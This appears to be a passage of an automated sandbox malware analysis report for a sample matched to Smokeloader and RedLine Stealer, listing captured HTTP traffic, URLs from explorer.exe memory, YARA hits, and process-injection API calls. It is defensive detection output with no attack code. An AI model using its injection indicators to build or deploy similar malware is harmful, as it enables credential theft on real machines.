      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
      Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
      Source: explorer.exe, 00000001.00000000.1797350947.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1791836520.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792703988.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1789210976.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49817 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00403103 RtlCreateUserThread,NtTerminateProcess,7_2_00403103
